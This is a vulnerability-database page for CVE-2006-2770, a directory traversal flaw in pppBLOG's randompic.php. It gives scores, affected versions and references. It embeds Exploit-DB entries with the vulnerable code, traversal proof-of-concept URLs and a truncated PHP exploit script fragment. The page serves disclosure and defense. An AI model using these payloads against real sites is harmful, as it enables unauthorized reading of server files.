CVE-2006-2770
published 2006-06-02CVE-2006-2770: Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary…
PriorityP430medium5.4CVSS 2.0
AVNACHAuNCCINAN
EXPLOIT
EPSS
3.48%
87.6th percentile
Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file[0].
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pppblog | pppblog | <= 0.3.8 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
pppBlog 0.3.11 - File Disclosure
exploitdb·2008-11-03
CVE-2006-2770 pppBlog 0.3.11 - File Disclosure
pppBlog 0.3.11 - File Disclosure
---
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# In memory of rgod ;)
*Requeriments: register_globals = On
vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
if (is_file($files[$randnum])){
readfile("$dir/$files[$randnum]");
}
}
...
poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../.
Exploit-DB
pppBlog 0.3.8 - System Disclosure
exploitdb·2006-05-31
CVE-2006-2770 pppBlog 0.3.8 - System Disclosure
pppBlog 0.3.8 - System Disclosure
---
#!/usr/bin/php -q -d short_open_tag=on
126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]."
No writeups or analysis indexed.
http://retrogod.altervista.org/pppblog_038_xpl.htmlhttp://secunia.com/advisories/20375http://securityreason.com/securityalert/1015http://securitytracker.com/id?1016198http://www.securityfocus.com/archive/1/435406/100/0/threadedhttp://www.securityfocus.com/bid/18189http://www.vupen.com/english/advisories/2006/2085https://exchange.xforce.ibmcloud.com/vulnerabilities/26969http://retrogod.altervista.org/pppblog_038_xpl.htmlhttp://secunia.com/advisories/20375http://securityreason.com/securityalert/1015http://securitytracker.com/id?1016198http://www.securityfocus.com/archive/1/435406/100/0/threadedhttp://www.securityfocus.com/bid/18189http://www.vupen.com/english/advisories/2006/2085https://exchange.xforce.ibmcloud.com/vulnerabilities/26969
2006-06-02
Published